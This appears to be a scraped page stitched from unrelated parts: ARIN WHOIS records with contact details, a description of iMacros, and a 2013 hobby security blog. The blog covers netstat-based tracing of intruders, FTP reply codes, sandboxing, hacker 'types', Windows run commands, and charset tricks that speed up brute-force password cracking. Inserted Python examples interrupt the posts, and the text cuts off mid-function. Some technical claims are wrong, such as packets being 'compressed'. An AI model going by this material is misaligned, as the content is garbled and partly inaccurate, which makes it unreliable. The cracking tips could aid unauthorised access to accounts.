RegDate: 1999-04-20
Updated: 2012-03-02
Ref: http://whois.arin.net/rest/net/NET-209-124-64-0-1
OrgName: Dragon Networks, Inc.
OrgId: DRAGON-8
Address: 93, Moor Lane
City: Wilmslow
StateProv: Cheshire
PostalCode: SK9 6BR
Country: GB
RegDate: 2002-05-19
Updated: 2012-06-21
Ref: http://whois.arin.net/rest/org/DRAGON-8
OrgAbuseHandle: ABUSE1150-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1 404.300.9889
OrgAbuseEmail: @dragonnetwurx.com
OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE1150-ARIN
OrgNOCHandle: CTS4-ARIN
OrgNOCName: Smith, Charles T
OrgNOCPhone: +1 404-949-7884
OrgNOCEmail: @dragonnetwurx.com
OrgNOCRef: http://whois.arin.net/rest/poc/CTS4-ARIN
OrgTechHandle: ABUSE1150-ARIN
OrgTechName: Abuse
OrgTechPhone: +1 404.300.9889
OrgTechEmail: @dragonnetwurx.com
OrgTechRef: http://whois.arin.net/rest/poc/ABUSE1150-ARIN
# end
# start
NetRange: 209.124.87.0 - 209.124.87.15
CIDR: 209.124.87.0/28
OriginAS: AS22653
NetName: NET-209-124-87-0-1
NetHandle: NET-209-124-87-0-1
Parent: NET-209-124-64-0-1
NetType: Reassigned
RegDate: 2013-04-26
Updated: 2013-04-26
Ref: http://whois.arin.net/rest/net/NET-209-124-87-0-1
OrgName: J. Eaton
OrgId: JE-98
Address: PO Box 3109 # 22016
City: Houston
StateProv: TX
PostalCode: 77253-3109
Country: US
RegDate: 2013-04-26
Updated: 2013-04-26
Ref: http://whois.arin.net/rest/org/JE-98
OrgAbuseHandle: ADMIN4210-ARIN
OrgAbuseName: Administrator
OrgAbusePhone: +1-760-683-4974
OrgAbuseEmail: @gmail.com
OrgAbuseRef: http://whois.arin.net/rest/poc/ADMIN4210-ARIN
OrgTechHandle: ADMIN4210-ARIN
OrgTechName: Administrator
OrgTechPhone: +1-760-683-4974
OrgTechEmail: @gmail.com
OrgTechRef: http://whois.arin.net/rest/poc/ADMIN4210-ARIN
# end
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
iMacros
iMacros is an extension for the Mozilla Firefox, Google Chrome, and Internet Explorer web browsers which adds record and replay functionality similar to that found in web testing and form filler software. The macros can be combined and controlled via JavaScript. Demo macros and JavaScript code examples are included with the software. iMacros was developed by iOpus. First released in 2001, iMacros was the first macro recorder tool specifically designed and optimized for web browsers and form filling.
iMacros for Firefox and Chrome offers a feature known as social scripting. It allows users to share macros and scripts in a way that is similar to how they share bookmarks on the many social bookmarking websites. After creating a new macro, users can click just once to share it with their friends as a link, either by distributing the link via email and social bookmarking websites, or by embedding it in a website or blog for public access. Technically, this is accomplished by embedding the imacro and the controlling JavaScript inside a plain text link.
Along with the freeware version, iMacros is available as a proprietary commercial application, with additional features and support for web scripting, web scraping, internet server monitoring, and web testing. In addition to working with HTML pages, the commercial editions can automate Adobe Flash, Adobe Flex, Silverlight, and Java applets by using Directscreen and image recognition technology.
Advanced versions also contain a command-line interface and an application programming interface (API) to automate more complicated tasks and integrate with other programs or scripts. The iMacros API is called Scripting Interface. The Scripting Interface of the iMacros Scripting Edition is designed as a Component Object Model (COM) object and allows the user to remotely control (script) the iMacros Browser, Internet Explorer, and Firefox from any Windows programming or scripting language.
Friday, June 7, 2013
Track Down a Hacker
Sometimes, it's just not enough to simply know that there's a Trojan or Virus onboard. Sometimes you need to know exactly why that file is on-board, how it got there - but most importantly, who put it there.
By enumerating the attacker in the same way that they have enumerated the victim, you will be able to see the bigger picture and establish what you're up against.
Connections make the world go round
The computer world, at any rate. Every single time you open up a website, send an email or upload your webpages into cyberspace, you are connecting to another machine in order to get the job done. This, of course, presents a major problem, because this simple act is what allows malicious users to target a machine in the first place.
# How do these people find their victim?
Well, first of all, they need to get hold of the victim's IP Address. Your IP (Internet Protocol) address reveals your point of entry to the Internet and can be used in many ways to cause your online activities many, many problems. It may not reveal you by name, but it may be uniquely identifiable and it represents your digital ID while you are online (especially so if you're on a fixed IP / DSL etc).
With an IP address, a Hacker can find out all sorts of weird and wonderful things about their victim (as well as causing all kinds of other trouble, the biggest two being Portnukes/Trojans and the dreaded DoS ((Denial of Service)) attack). Some Hackers like to collect IP Addresses like badges, and like to go back to old targets, messing them around every so often. An IP address is incredibly easy to obtain - until recently, many realtime chat applications (such as MSN) were goldmines of information. Your IP Address is contained as part of the Header Code on all emails that you send and webpages that you visit can store all kinds of information about you.
A common trick is for the Hacker to go into a Chatroom, paste his supposed website address all over the place, and when the unsuspecting victim visits, everything about your computer from the operating system to the screen resolution can be logged...and, of course, the all important IP address. In addition, a simple network-wide port scan will reveal vulnerable target machines, and a war-dialler will scan thousands of lines for exposed modems that the hacker can exploit.
So now that you know some of the basic dangers, you're probably wondering how these people connect to a victim's machine?
Virtual and Physical Ports
Everything that you receive over the Internet comes as a result of other machines connecting to your computer's ports. You have two types; Physical are the holes in the back of your machine, but the important ones are Virtual. These allow transfer of data between your computer and the outside world, some with allocated functions, some without, but knowing how these work is the first step to discovering who is attacking you; you simply MUST have a basic knowledge of this, or you won't get much further.
What do the phrases TCP/UDP actually mean?
TCP/IP stands for Transmission Control Protocol and Internet Protocol, a TCP/IP packet is a block of data which is compressed, then a header is put on it and it is sent to another computer (UDP stands for User Datagram Protocol). This is how ALL internet transfers occur, by sending packets. The header in a packet contains the IP address of the one who originally sent you it. Now, your computer comes with an excellent (and free) tool that allows you to see anything that is connected (or is attempting to connect) to you, although bear in mind that it offers no blocking protection; it simply tells you what is going on, and that tool is NETSTAT.
Netstat: Your first line of defence
Netstat is a very fast and reliable method of seeing exactly who or what is connected (or connecting) to your computer. Open up DOS (Start/Programs/MS-DOS Prompt on most systems), and in the MSDOS Prompt, type:
netstat -a
(make sure you include the space in between the "t" and the "a").
If you're connected to the Internet when you do this, you should see something like:
Active Connections
Proto  Local Address     Foreign Address                    State
TCP    macintosh:20034   modem-123.tun.dialup.co.uk:50505   ESTABLISHED
TCP    macintosh:80      proxy.webcache.eng.sq:30101        TIME_WAIT
TCP    macintosh         MACINTOSH:0                        LISTENING
TCP    macintosh         MACINTOSH:0                        LISTENING
TCP    macintosh         MACINTOSH:0                        LISTENING
Now, "Proto(col)" simply means what kind of data transmission is taking place (TCP or UDP), "Local address" is your computer (and the number next to it tells you what port you're connected on), "Foreign Address" is the machine that is connected to you (and what port they're using), and finally "State" is simply whether or not a connection is actually established, or whether the machine in question is waiting for a transmission, or timing out etc.
Now, you need to know all of Netstat's various commands, so type:
netstat ?
You will get something like this:
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default.
Have a play around with the various options, but the most important use of these methods is when you combine them. The best command to use is
netstat -an
because this will list all connections in Numerical Form, which makes it a lot easier to trace malicious users....Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). Also, by doing this, you can also find out what your own IP address is, which is always useful.
Also,
netstat -b
will tell you what ports are open and what programs are connecting to the internet.
Types of Port
It would be impossible to find out who was attacking you if computers could just access any old port to perform an important function; how could you tell a mail transfer from a Trojan Attack? Well, good news, because your regular, normal connections are assigned to low, commonly used ports, and in general, the higher the number used, the more you should be suspicious. Here are the three main types of port:
# Well Known Ports These run from 0 to 1023, and are bound to the common services that run on them (for example, mail runs on channel 25 tcp/udp, which is smtp (Simple Mail Transfer Protocol) so if you find one of these ports open (and you usually will), it's usually because of an essential function.
# Registered Ports These run on 1024 to 49151. Although not bound to a particular service, these are normally used by networking utilities like FTP software, Email client and so on, and they do this by opening on a random port within this range before communicating with the remote server, so don't panic (just be wary, perhaps) if you see any of these open, because they usually close automatically when the system that's running on them terminates (for example, type in a common website name in your browser with netstat open, and watch as it opens up a port at random to act as a buffer for the remote servers). Services like MSN Messenger and ICQ usually run on these Ports.
# Dynamic/Private Ports Ranging from 49152 to 65535, these things are rarely used except with certain programs, and even then not very often. This is indeed the usual range of the Trojan, so if you find any of these open, be very suspicious. So, just to recap:
Well Known Ports 0 to 1023 Commonly used, little danger.
Registered Ports 1024 to 49151 Not as common, just be careful.
Dynamic/Private Ports 49152 to 65535 Be extremely suspicious.
The hunt is on
Now, it is essential that you know what you're looking for, and the most common way someone will attack your machine is with a Trojan. This is a program that is sent to you in an email, or attempts to bind itself to one of your ports, and when activated, it can give the user your passwords, access to your hard drive...they can even make your CD Tray pop open and shut. At the end of this Document, you will find a list of the most commonly used Trojans and the ports they operate on. For now, let's take another look at that first example of Netstat....
Active Connections
Proto  Local Address     Foreign Address                    State
TCP    macintosh:27374   modem-123.tun.dialup.co.uk:50505   ESTABLISHED
TCP    macintosh:80      proxy.webcache.eng.sq:30101        TIME_WAIT
TCP    macintosh         MACINTOSH:0                        LISTENING
TCP    macintosh         MACINTOSH:0                        LISTENING
TCP    macintosh         MACINTOSH:0                        LISTENING
Now, straight away, this should make more sense to you. Your computer is connected on two ports, 80 and 27374. Port 80 is used for http/www transmissions (ie for all intents and purposes, it's how you connect to the net, although of course it's a lot more complicated than that). Port 27374, however, is distinctly suspicious; first of all, it is in the registered port range, and although other services (like MSN) use these, let's assume that you have nothing at all running like instant messengers, webpages etc....you're simply connected to the net through a proxy.
So, now this connection is looking even more troublesome, and when you realise that 27374 is a common port for Netbus (a potentially destructive Trojan), you can see that something is untoward here. So, what you would do is:
1) Run Netstat, and use:
netstat -a
then
netstat -an
so you have both hostnames AND IP addresses.
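The port-range recap and the "hunt" above are a manual triage of netstat -an output. The following Python script is an added example (not from this blog) that parses that output and applies the same three-band rule: the class of each open local port decides the verdict, and TIME_WAIT leftovers are reported separately. It also lists the local addresses seen, which is the "find your own IP" side-benefit mentioned above. The sample listing is constructed in the Windows netstat -an layout with documentation addresses; parse_netstat, classify_port and review are my names.

```python
# Constructed sample of `netstat -an` output (Windows layout); the addresses
# are from documentation ranges and were not captured from a real machine.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.168.1.10:80        198.51.100.9:30101     TIME_WAIT
  TCP    192.168.1.10:27374     203.0.113.7:50505      ESTABLISHED
  TCP    0.0.0.0:54321          0.0.0.0:0              LISTENING
  UDP    0.0.0.0:500            *:*
"""


def classify_port(port):
    """The three bands used in the text: 0-1023, 1024-49151, 49152-65535."""
    if port is None:
        return "unknown"
    if port <= 1023:
        return "well-known"
    if port <= 49151:
        return "registered"
    return "dynamic/private"


def split_endpoint(endpoint):
    """'host:port' -> (host, int port or None); handles '*:*' and IPv6 '[::]:135'."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Parse the table rows of `netstat -an`, skipping the banner and column header."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue
        lhost, lport = split_endpoint(fields[1])
        fhost, fport = split_endpoint(fields[2])
        rows.append({
            "proto": fields[0],
            "local_host": lhost, "local_port": lport,
            "foreign_host": fhost, "foreign_port": fport,
            "state": fields[3] if len(fields) > 3 else "",  # UDP rows carry no state
        })
    return rows


# Verdicts from the recap table in the text.
VERDICT = {
    "well-known": "little danger",
    "registered": "be careful",
    "dynamic/private": "be extremely suspicious",
}


def review(rows):
    """Rate each open socket by the band of its local port.

    Only listening or established TCP sockets and UDP sockets count as open;
    TIME_WAIT and other closing states are labelled 'closing' rather than rated.
    """
    out = []
    for r in rows:
        open_socket = r["proto"] == "UDP" or r["state"] in ("LISTENING", "ESTABLISHED")
        band = classify_port(r["local_port"])
        out.append({**r, "port_class": band,
                    "verdict": VERDICT.get(band, "unknown") if open_socket else "closing"})
    return out


def own_addresses(rows):
    """Local addresses seen in the listing, minus wildcard and loopback."""
    skip = {"0.0.0.0", "127.0.0.1", "[::]", "[::1]", "*"}
    return sorted({r["local_host"] for r in rows if r["local_host"] not in skip})


if __name__ == "__main__":
    for r in review(parse_netstat(SAMPLE_NETSTAT)):
        print(f"{r['proto']:4} {r['local_host']}:{r['local_port']} -> "
              f"{r['foreign_host']}:{r['foreign_port']} [{r['state'] or '-'}] "
              f"{r['port_class']}: {r['verdict']}")
    print("own addresses:", own_addresses(parse_netstat(SAMPLE_NETSTAT)))
```

The band rule is a heuristic, as the text itself says: a listener on a low port is only "little danger" if that service is meant to be there, so the next step is always netstat -b (run as Administrator) to see which program owns the socket before deciding anything.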
Tracerouting
Having the attacker's IP is all well and good, but what can you do with it? The answer is, a lot more! It's not enough to have the address, you also need to know where the attacker's connections are coming from. You may have used automated tracerouting tools before, but do you know how they work?
Go back to MSDOS and type
tracert *type IP address/Hostname here*
Now, what happens is, the Traceroute will show you all the computers in between you and the target machine, including blockages, firewalls etc. More often than not, the hostname address listed before the final one will belong to the Hacker's ISP Company. It'll either say who the ISP is somewhere in there, or else you run a second trace on the new IP/hostname address to see who the ISP Company in question is.
If the Hostname that you get back doesn't actually seem to mention an actual geographical location within its text, you may think all is lost. But fear not! Suppose you get a hostname such as
http://www.haha.com
Well, that tells us nothing, right? Wrong....simply enter the hostname in your browser, and though many times you will get nothing back, sometimes it will resolve to an ISP, and from there you can easily find out its location and in what areas they operate. This at least gives you a firm geographical location to carry out your investigations in.
If you STILL have nothing, as a last resort you COULD try connecting to your target's ISP's port 13 by Telnet, which will tell you how many hours ahead or behind this ISP is of GMT, thus giving you a geographical trace based on the time mentioned (although bear in mind, the ISP may be doing something stupid like not having their clocks set correctly, giving you a misleading trace. Similarly, a common tactic of Hackers is to deliberately have their computer's clock set to a totally wrong time, so as to throw you off the scent). Also, unless you know what you're doing, I wouldn't advise using Telnet (which is outside the parameters of this tutorial).
Reverse DNS Query
This is probably the most effective way of running a trace on somebody. If ever you're in a chatroom and you see someone saying that they've "hacked into a satellite orbiting the Earth, and are taking pictures of your house right now", ignore them because that's just bad movie nonsense. THIS method is the way to go, with regard to finding out what country (even maybe what State/City etc) someone resides, although it's actually almost impossible to find an EXACT geographical location without actually breaking into your ISP's Head Office and running off with the safe.
To run an rDNS query, simply go back to MS-DOS and type
netstat and hit return. Any active connections will resolve to hostnames rather than a numerical format.
DNS
DNS stands for Domain Name Server. These are machines connected to the Internet whose job it is to keep track of the IP Addresses and Domain Names of other machines. When called upon, they take the ASCII Domain Name and convert it to the relevant numeric IP Address. A DNS search translates a hostname into an IP address....which is why we can enter "www.Hotmail.com" and get the website to come up, instead of having to actually remember Hotmail's IP address and enter that instead. Well, Reverse DNS, of course, translates the IP Address into a Hostname (ie - in letters and words instead of numbers, because sometimes the Hacker will employ various methods to stop Netstat from picking up a correct Hostname).
So, for example,
298.12.87.32 is NOT a Hostname.
mail6.bol.net.au IS a Hostname.
Anyway, see the section at the end? (au) means the target lives in Australia. Most (if not all) hostnames end in a specific Country Code, thus narrowing down your search even further. If you know your target's Email Address (ie they foolishly sent you a hate mail, but were silly enough to use a valid email address) but nothing else, then you can use the Country codes to deduce where they're from as well.
You can also deduce the IP address of the sender by looking at the emails header (a "hidden" line of code which contains information on the sender)...on Hotmail for example, go to Preferences, and select the "Full Header's Visible" option. Alternatively, you can run a "Finger" Trace on the email address, at:
www.samspade.org
Plus, some ISP's include their name in your Email Address with them too (ie Wanadoo, Supanet etc), and your Hacker may be using an email account that's been provided by a Website hosting company, meaning this would probably have the website host's name in the email address (ie Webspawners). So, you could use the information gleaned to maybe even hunt down their website (then you could run a website check as mentioned previously) or report abuse of that Website Provider's Email account (and thus, the Website that it goes with) to
abuse@companynamegoeshere.com
FTP Error Codes
FTP Error Messages
Some nice info about FTP error codes so you know what they mean. I am sure you see them all the time and sometimes you don't know what they mean, so take a look here. The most common codes:
421 - often means: too many users logged in to the same account.
530 - wrong login/pass; some servers auto-switch to 530 from 421 when they reach the max # of users, so notice the error message attached to the code.
550 - common on ratio sites. If the file exists, it means you have no access to the file or dir. If you try changing directories in an FTP and you're getting a 550 message, it means you don't have access to the directory. It doesn't mean you don't have access to a directory inside that directory (meaning when you have a direct path, log into the path directly, not one directory at a time).
All others:
110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm Where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
120 Service ready in nnn minutes.
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message. On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
220 Service ready for new user.
221 Service closing control connection. Logged out if appropriate.
225 Data connection open; no transfer in progress.
226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information.
421 Too many users logged to the same account
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken. File unavailable (e.g., file busy).
451 Requested action aborted: local error in processing.
452 Requested action not taken. Insufficient storage space in system.
500 Syntax error, command unrecognized. This may include errors such as command line too long.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. File unavailable (e.g., file not found, no access).
551 Requested action aborted: page type unknown.
552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553 Requested action not taken. File name not allowed.
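As an added example (not from the original post), the following Python parses replies like those in the list above, handles the multi-line reply form, separates "server full" from "wrong password" by reading the attached text as the note at the top advises, and decodes the 227 passive-mode address tuple. The sample replies are constructed, not captured from a real server.

```python
import re
from dataclasses import dataclass
from typing import Tuple

# Reply classes by first digit, matching the groups in the list above.
REPLY_CLASSES = {
    "1": "positive preliminary",
    "2": "positive completion",
    "3": "positive intermediate",
    "4": "transient negative (retry later)",
    "5": "permanent negative (fix the request first)",
}


@dataclass
class FtpReply:
    code: int
    text: str        # human-readable part; multi-line replies joined with "\n"
    multiline: bool

    @property
    def category(self) -> str:
        return REPLY_CLASSES.get(str(self.code)[0], "unknown")

    @property
    def is_error(self) -> bool:
        return self.code >= 400


def parse_reply(raw: str) -> FtpReply:
    """Parse one reply read from the FTP control connection.

    Single-line replies look like "530 Not logged in."; a multi-line reply
    starts with "xyz-" and ends on a line starting with "xyz " (same code).
    """
    lines = raw.replace("\r\n", "\n").rstrip("\n").split("\n")
    m = re.match(r"^(\d{3})([ -])(.*)$", lines[0])
    if not m:
        raise ValueError(f"malformed FTP reply line: {lines[0]!r}")
    code, sep, first_text = int(m.group(1)), m.group(2), m.group(3)
    if sep == " ":
        if len(lines) != 1:
            raise ValueError("single-line reply followed by extra lines")
        return FtpReply(code, first_text.strip(), False)
    body = [first_text]
    terminator = f"{code} "
    for line in lines[1:]:
        if line.startswith(terminator):
            body.append(line[len(terminator):])
            return FtpReply(code, "\n".join(s.strip() for s in body), True)
        body.append(line)
    raise ValueError("multi-line reply without terminator line")


def interpret_login_failure(reply: FtpReply) -> str:
    """Separate 'server full' from 'bad credentials'.

    As noted at the top of the post, some servers answer 530 instead of 421
    once they hit their user limit, so the attached text has to be read too.
    """
    text = reply.text.lower()
    if reply.code == 421 or (reply.code == 530 and "too many" in text):
        return "server full: retry later"
    if reply.code == 530:
        return "authentication failed: check credentials"
    return f"not a login failure ({reply.code})"


def parse_pasv(reply: FtpReply) -> Tuple[str, int]:
    """Extract host and port from a 227 reply "(h1,h2,h3,h4,p1,p2)"."""
    if reply.code != 227:
        raise ValueError(f"expected 227, got {reply.code}")
    m = re.search(r"(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)", reply.text)
    if not m:
        raise ValueError("no address tuple in 227 reply")
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if not all(0 <= v <= 255 for v in (h1, h2, h3, h4, p1, p2)):
        raise ValueError("address byte out of range")
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


if __name__ == "__main__":
    # Constructed sample replies (not captured from a real server).
    for raw in ("421 Too many users logged to the same account\r\n",
                "530 Not logged in.\r\n",
                "227 Entering Passive Mode (192,0,2,10,195,149).\r\n"):
        r = parse_reply(raw)
        print(r.code, r.category, "|", interpret_login_failure(r))
```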
Thursday, June 6, 2013
Sand Box
What is sand box?
A sandbox is a security mechanism for separating running programs. It is often used to execute untested code or untrusted programs from unverified third parties, suppliers, untrusted users and untrusted websites. The sandbox typically provides a tightly controlled set of resources for guest programs to run in, such as scratch space on disk and in memory. Network access, the ability to inspect the host system and reading from input devices are usually disallowed or heavily restricted.
Sandboxie
Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.
The red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk (no sandbox) shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.
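As an added illustration (a toy model written for this page, not Sandboxie's own code), the following Python shows the copy-on-write idea the figure describes: reads fall through to the host, writes and deletes are captured in an overlay, and discarding the overlay throws every change away at once while the host data is never touched. File paths and contents are constructed samples.

```python
from __future__ import annotations

from typing import Dict, Optional, Set


class SandboxedStore:
    """Copy-on-write model of a sandboxed file store.

    `host` plays the role of "Hard disk (no sandbox)"; the overlay and the
    whiteout set together are the yellow rectangle in the figure.
    """

    def __init__(self, host: Dict[str, bytes]):
        self._host = host                         # never modified by the guest
        self._overlay: Dict[str, bytes] = {}      # files created/changed inside the box
        self._whiteouts: Set[str] = set()         # host files deleted inside the box

    def read(self, path: str) -> Optional[bytes]:
        """What the sandboxed program sees: overlay first, then the host."""
        if path in self._whiteouts:
            return None
        if path in self._overlay:
            return self._overlay[path]
        return self._host.get(path)

    def write(self, path: str, data: bytes) -> None:
        """Intercepted write: lands in the overlay, not on the host."""
        self._whiteouts.discard(path)
        self._overlay[path] = data

    def delete(self, path: str) -> None:
        """Intercepted delete: hide the host copy instead of removing it."""
        self._overlay.pop(path, None)
        if path in self._host:
            self._whiteouts.add(path)

    def changes(self) -> Dict[str, Optional[bytes]]:
        """Everything the guest changed, grouped together (None = deleted)."""
        out: Dict[str, Optional[bytes]] = {p: None for p in self._whiteouts}
        out.update(self._overlay)
        return out

    def discard(self) -> int:
        """Throw all captured changes away at once; returns how many there were."""
        n = len(self._overlay) + len(self._whiteouts)
        self._overlay.clear()
        self._whiteouts.clear()
        return n


if __name__ == "__main__":
    # Constructed sample: a browser running in the box drops a file and
    # overwrites then deletes a document; the host copy survives the discard.
    host = {"C:/Users/me/Documents/notes.txt": b"keep me"}
    box = SandboxedStore(host)
    box.write("C:/Users/me/AppData/dropped.exe", b"MZ...")
    box.write("C:/Users/me/Documents/notes.txt", b"overwritten")
    box.delete("C:/Users/me/Documents/notes.txt")
    print("guest view:", box.read("C:/Users/me/Documents/notes.txt"))
    print("host view:", host)
    print("discarded", box.discard(), "changes; host still:", host)
```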
Benefits of the Isolated Sandbox
- Secure Web Browsing: Running your Web browser under the protection of Sandboxie means that all malicious software downloaded by the browser is trapped in the sandbox and can be discarded trivially.
- Enhanced Privacy: Browsing history, cookies, and cached temporary files collected while Web browsing stay in the sandbox and don't leak into Windows.
- Secure E-mail: Viruses and other malicious software that might be hiding in your email can't break out of the sandbox and can't infect your real system.
- Windows Stays Lean: Prevent wear-and-tear in Windows by installing software into an isolated sandbox.
Tuesday, June 4, 2013
Types Of Hackers
Hacker: a person who accesses a computer resource without authorization, or who uses his or her skills to commit unlawful acts or to deliberately create mischief.
There are six types of hackers:
- CODERS
- ADMINS
- SCRIPT KIDDIES
- WHITE HAT
- BLACK HAT
- GREY HAT
CODERS
The real hackers are the coders, the ones who revise the methods and create the tools that are available in the market. Coders can find security holes and weaknesses in software, such as buffer overflows, and create their own exploits.
ADMINS
Admins are the computer guys who use the tools and exploits prepared by the coders. They do not develop their own techniques; instead they use the tricks already prepared by the coders. They are generally system administrators or computer network controllers. Most of the hackers and security people in this digital world come under this category.
SCRIPT KIDDIES
Script kiddies are the bunnies who use scripts and programs developed by others to attack computer systems and networks. They get the least respect but are the most annoying and dangerous, and can cause big problems without actually knowing what they are doing.
WHITE HAT
A white hat hacker is a computer guy who performs ethical hacking. These are usually security professionals with knowledge of hacking and the hacker toolset, who use this knowledge to locate security weaknesses and implement countermeasures in those resources. They are also known as ethical hackers or penetration testers. They focus on securing and protecting IT systems.
BLACK HAT
A black hat hacker is a computer guy who performs unethical hacking. These are the criminal hackers or crackers who use their skills and knowledge for illegal or malicious purposes. They break into or otherwise violate the system integrity of remote machines with malicious intent. They are also known as unethical hackers or security crackers. They focus on security cracking and data stealing.
GREY HAT
A grey hat hacker is a computer guy who sometimes acts legally, sometimes in good will, and sometimes not. They usually do not hack for personal gain or have malicious intentions, but may occasionally commit crimes during the course of their technological exploits. They are a hybrid between white hat and black hat hackers.
Common Run Command
compmgmt.msc = computer management
certmgr.msc = certificate manager
diskmgmt.msc = disk management
devmgmt.msc = device manager
eventvwr.msc = event viewer
fsmgmt.msc = share folder manager
gpedit.msc = group policy editor
lusrmgr.msc = local users and groups
ntmsmgr.msc = removable storage
ntmsoprq.msc = removable storage operator requests
perfmon.msc = performance monitor
rsop.msc = resultant set of policy
secpol.msc = local security settings
services.msc = services
wmimgmt.msc = windows management instrumentation
conf = netmeeting
calc = calculator
clipbrd = clipbook viewer
charmap = character mapping table
chkdsk.exe = check disk
cmd = command prompt
cleanmgr = clean disk
dxdiag = check DirectX information
dcomcnfg = component services
eudcedit = private character editor
logoff = logoff
mem.exe = memory usage
msconfig.exe = system configuration
mplayer2 = windows media player
mspaint = paint
mstsc = remote desktop
magnify = magnify
mmc = microsoft management console
mobsync = synchronize setting
notepad = notepad
ntbackup = backup or restore wizard
narrator = narrator
osk = on screen keyboard
odbcad32 = ODBC data source administrator
packager = object packager
regedit.exe = registry
rononce -p = shutdown (15secs)
regedt32 = registry editor
sysedit = system configuration editor
sigverif = file signature verification
sndrec32 = sound recorder
shrpubw = create shared folder wizard
syskey = encrypt windows
Sndvol32 = volume control
sfc.exe = resource checker
tsshutdn = shutdown (60secs)
taskmgr = task manager
tourstart = xp tour
utilman = ease of access center
winchat = windows chat
winver = check windows version
winmsd = check system information
wupdmgr = windows update manager
wscript = windows script host
write = word pad
Control
Control userpasswords2
Control access.cpl
Control appwiz.cpl
Control bthprops.cpl
Control desk.cpl
Control hdwwiz.cpl
Control inetcpl.cpl
Control firewall.cpl
Control intl.cpl
Control irprops.cpl
Control joy.cpl
Control main.cpl
Control mmsys.cpl
Control ncpa.cpl
Control netsetup.cpl
Control nusrmgr.cpl
Control nvtuicpl.cpl
Control odbccp32.cpl ODBC
Control powercfg.cpl
Control sysdm.cpl
Control telephon.cpl
Control timedate.cpl
Control wscui.cpl Windows
Control wuaucpl.cpl
shell:Common Administrative Tools
shell:Administrative Tools
shell:SystemX86 System32
shell:My Pictures
shell:Profile %userprofile%
shell:CommonProgramFiles
shell:ProgramFiles %programfiles%
shell:System
shell:Windows %windir%
shell:History
shell:Cookies
shell:Local AppData
shell:AppData
shell:Common Documents
shell:Common Templates
shell:Common AppData
shell:Common Favorites
shell:Common Desktop
shell:Common Menu
shell:Common Programs
shell:Common Startup
shell:Templates
shell:PrintHood
shell:NetHood
shell:Favorites
shell:Personal
shell:SendTo
shell:Recent
shell:Menu
shell:Programs
shell:Startup
shell:Desktop
shell:Fonts
shell:ConnectionsFolder
shell:RecycleBinFolder
shell:PrintersFolder
shell:ControlPanelFolder Control
shell:InternetFolder
shell:DriveFolder
shell:NetworkFolder
shell:DesktopFolder
Monday, June 3, 2013
Enhance Brute Force Attack Charset
Choosing a custom charset of 0123456789abcdefghijklmnopqrstuvwxyz, you'll get passwords much faster than with the standard a-z0-9 charset. With a charset of a-z0-9, a password cracking program will try aaaaaaa, baaaaaa, caaaaaa and so on.
But with 0-9a-z, the program will try 00000000, 10000000, 20000000 and so on, so you'll get the passwords with numbers at the end first. In other words, whereas the default numbers-last charset will only reach the passwords with numbers at the end after almost the maximum time, a custom charset with numbers first will start with passwords with numbers at the end. It's not much, but I find it does help.
Another common technique is to use eatoinsrhldcumfpgwybvkxjqz instead of abcdefghijklmnopqrstuvwxyz.
Everyone knows that 'e' is the most commonly used letter in the English language, so it makes sense to try it before the less commonly used letters. In fact, 'j', 'q' and 'z' are so uncommon that I sometimes leave them off the list altogether, since it makes such a significant improvement in cracking time.
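As an added example (not from the original post), the following Python computes where a given password falls in the fixed-length enumeration the post describes, so the effect of the charset order can be measured rather than guessed: a password ending in digits is reached far earlier with the numbers-first order, while one starting with digits is reached later. This is the kind of guess-count estimate used when assessing a password policy; the sample passwords are constructed.

```python
# Charsets as given in the post.
DEFAULT_CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"   # letters first, numbers last
NUMBERS_FIRST = "0123456789abcdefghijklmnopqrstuvwxyz"     # the custom order from the post
FREQ_LETTERS = "eatoinsrhldcumfpgwybvkxjqz"                # letter-frequency order from the post


def guess_index(password: str, charset: str) -> int:
    """0-based position of `password` among all candidates of the same length.

    The enumeration is the one the post describes: the first character varies
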